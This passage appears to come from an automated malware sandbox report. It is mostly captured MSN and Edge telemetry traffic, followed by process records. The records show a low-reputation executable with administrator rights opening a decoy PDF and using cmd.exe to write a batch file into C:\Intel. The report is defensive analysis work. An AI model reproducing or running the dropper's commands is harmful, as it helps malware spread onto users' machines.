                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.ContentView","time":"2025-01-11T06:55:06.865Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":17,"installId":"79ce19f4-5d97-4e79-bde7-86678df03e68","epoch":"709624609"},"app":{"loc
                                                                                                                                                                  2025-01-11 06:55:08 UTC889INHTTP/1.1 204 No Content
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                  Set-Cookie: MC1=GUID=3ac531e5acd947deb9a2a775d0e24cdf&HASH=3ac5&LV=202501&V=4&LU=1736578507863; Domain=.microsoft.com; Expires=Sun, 11 Jan 2026 06:55:07 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  Set-Cookie: MS0=19937859f87f46d89ca2bda03652137d; Domain=.microsoft.com; Expires=Sat, 11 Jan 2025 07:25:07 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  time-delta-millis: 997
                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:55:07 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  75192.168.11.205723813.89.179.10443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:55:10 UTC1050OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578509354&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 10428
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                  2025-01-11 06:55:10 UTC10428OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 31 31 54 30 36 3a 35 35 3a 30 39 2e 33 35 33 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 38 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 37 39 63 65 31 39 66 34 2d 35 64 39 37 2d 34 65 37 39 2d 62 64 65 37 2d 38 36 36 37 38 64 66 30 33 65 36 38 22 2c 22 65 70 6f 63 68 22 3a 22 37 30 39 36 32 34 36 30 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63
                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.ContentView","time":"2025-01-11T06:55:09.353Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":18,"installId":"79ce19f4-5d97-4e79-bde7-86678df03e68","epoch":"709624609"},"app":{"loc
                                                                                                                                                                  2025-01-11 06:55:11 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                  Set-Cookie: MC1=GUID=c83f8144f6b647b197765263f26bbc0d&HASH=c83f&LV=202501&V=4&LU=1736578511035; Domain=.microsoft.com; Expires=Sun, 11 Jan 2026 06:55:11 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  Set-Cookie: MS0=23b02bcf18b3418fad2fbdd9428e3666; Domain=.microsoft.com; Expires=Sat, 11 Jan 2025 07:25:11 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  time-delta-millis: 1681
                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:55:11 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  76192.168.11.206161413.89.179.10443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:55:13 UTC1050OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578512350&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 10371
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                  2025-01-11 06:55:13 UTC10371OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 31 31 54 30 36 3a 35 35 3a 31 32 2e 33 34 38 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 39 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 37 39 63 65 31 39 66 34 2d 35 64 39 37 2d 34 65 37 39 2d 62 64 65 37 2d 38 36 36 37 38 64 66 30 33 65 36 38 22 2c 22 65 70 6f 63 68 22 3a 22 37 30 39 36 32 34 36 30 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63
                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.ContentView","time":"2025-01-11T06:55:12.348Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":19,"installId":"79ce19f4-5d97-4e79-bde7-86678df03e68","epoch":"709624609"},"app":{"loc
                                                                                                                                                                  2025-01-11 06:55:13 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                  Set-Cookie: MC1=GUID=9c81977b91aa49cab5d6d626ebedbd1a&HASH=9c81&LV=202501&V=4&LU=1736578513359; Domain=.microsoft.com; Expires=Sun, 11 Jan 2026 06:55:13 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  Set-Cookie: MS0=4cab1e29b5c7409a96df5ef61798e78c; Domain=.microsoft.com; Expires=Sat, 11 Jan 2025 07:25:13 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  time-delta-millis: 1009
                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:55:12 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  77192.168.11.206288013.89.179.10443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:55:16 UTC1050OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578515356&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 10698
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                  2025-01-11 06:55:16 UTC10698OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 31 31 54 30 36 3a 35 35 3a 31 35 2e 33 35 35 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 30 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 37 39 63 65 31 39 66 34 2d 35 64 39 37 2d 34 65 37 39 2d 62 64 65 37 2d 38 36 36 37 38 64 66 30 33 65 36 38 22 2c 22 65 70 6f 63 68 22 3a 22 37 30 39 36 32 34 36 30 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63
                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.ContentView","time":"2025-01-11T06:55:15.355Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":20,"installId":"79ce19f4-5d97-4e79-bde7-86678df03e68","epoch":"709624609"},"app":{"loc
                                                                                                                                                                  2025-01-11 06:55:16 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                  Set-Cookie: MC1=GUID=27b1239b9ed84d0386a5a054fd2af0db&HASH=27b1&LV=202501&V=4&LU=1736578516402; Domain=.microsoft.com; Expires=Sun, 11 Jan 2026 06:55:16 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  Set-Cookie: MS0=28ca04c8f2a141a597921f55867158aa; Domain=.microsoft.com; Expires=Sat, 11 Jan 2025 07:25:16 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  time-delta-millis: 1046
                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:55:15 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  78192.168.11.206460513.89.179.10443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:55:19 UTC1050OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578518356&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 10413
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                  2025-01-11 06:55:19 UTC10413OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 31 31 54 30 36 3a 35 35 3a 31 38 2e 33 35 35 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 37 39 63 65 31 39 66 34 2d 35 64 39 37 2d 34 65 37 39 2d 62 64 65 37 2d 38 36 36 37 38 64 66 30 33 65 36 38 22 2c 22 65 70 6f 63 68 22 3a 22 37 30 39 36 32 34 36 30 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63
                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.ContentView","time":"2025-01-11T06:55:18.355Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":21,"installId":"79ce19f4-5d97-4e79-bde7-86678df03e68","epoch":"709624609"},"app":{"loc
                                                                                                                                                                  2025-01-11 06:55:19 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                  Set-Cookie: MC1=GUID=86cef9c567944cdf9dd514ba354632be&HASH=86ce&LV=202501&V=4&LU=1736578519357; Domain=.microsoft.com; Expires=Sun, 11 Jan 2026 06:55:19 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  Set-Cookie: MS0=aed585d757c34df995f8b9cf65dd7323; Domain=.microsoft.com; Expires=Sat, 11 Jan 2025 07:25:19 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  time-delta-millis: 1001
                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:55:19 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  79192.168.11.205422813.89.179.10443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:55:22 UTC1050OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578521342&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 10329
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                  2025-01-11 06:55:22 UTC10329OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 31 31 54 30 36 3a 35 35 3a 32 31 2e 33 34 31 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 37 39 63 65 31 39 66 34 2d 35 64 39 37 2d 34 65 37 39 2d 62 64 65 37 2d 38 36 36 37 38 64 66 30 33 65 36 38 22 2c 22 65 70 6f 63 68 22 3a 22 37 30 39 36 32 34 36 30 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63
                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.ContentView","time":"2025-01-11T06:55:21.341Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":22,"installId":"79ce19f4-5d97-4e79-bde7-86678df03e68","epoch":"709624609"},"app":{"loc
                                                                                                                                                                  2025-01-11 06:55:22 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                  Set-Cookie: MC1=GUID=1f2d009ac046477489b0a1c52b7c61ef&HASH=1f2d&LV=202501&V=4&LU=1736578522399; Domain=.microsoft.com; Expires=Sun, 11 Jan 2026 06:55:22 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  Set-Cookie: MS0=06191ec969c548de96dcb3936e01743a; Domain=.microsoft.com; Expires=Sat, 11 Jan 2025 07:25:22 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                  time-delta-millis: 1057
                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:55:21 GMT
                                                                                                                                                                  Connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  80192.168.11.205860423.33.85.243443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:55:32 UTC419OUTOPTIONS /api/report?cat=msn HTTP/1.1
                                                                                                                                                                  Host: deff.nelreports.net
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Origin: https://assets.msn.com
                                                                                                                                                                  Access-Control-Request-Method: POST
                                                                                                                                                                  Access-Control-Request-Headers: content-type
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  2025-01-11 06:55:33 UTC334INHTTP/1.1 200 OK
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Kestrel
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:55:32 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  PMUSER_FORMAT_QS:
                                                                                                                                                                  X-CDN-TraceId: 0.f5542117.1736578532.121a31bc
                                                                                                                                                                  Access-Control-Allow-Headers: *
                                                                                                                                                                  Access-Control-Allow-Credentials: false
                                                                                                                                                                  Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                  Access-Control-Allow-Origin: *


                                                                                                                                                                  Statistics

                                                                                                                                                                  CPU Usage

                                                                                                                                                                  Click to jump to process

                                                                                                                                                                  Memory Usage

                                                                                                                                                                  Click to jump to process

                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                  Behavior

                                                                                                                                                                  Click to jump to process

                                                                                                                                                                  System Behavior

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:0
                                                                                                                                                                  Start time:01:53:39
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Users\user\Desktop\Yv24LkKBY6.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\Yv24LkKBY6.exe"
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  File size:956'256 bytes
                                                                                                                                                                  MD5 hash:F0ABA799546B1CE04037793579DE3C94
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:2
                                                                                                                                                                  Start time:01:53:39
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Intel\ 131.pdf"
                                                                                                                                                                  Imagebase:0x180000
                                                                                                                                                                  File size:3'014'368 bytes
                                                                                                                                                                  MD5 hash:6791EAE6124B58F201B32F1F6C3EC1B0
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:3
                                                                                                                                                                  Start time:01:53:39
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c echo>C:\Intel\rezet.cmd cd C:\Intel\
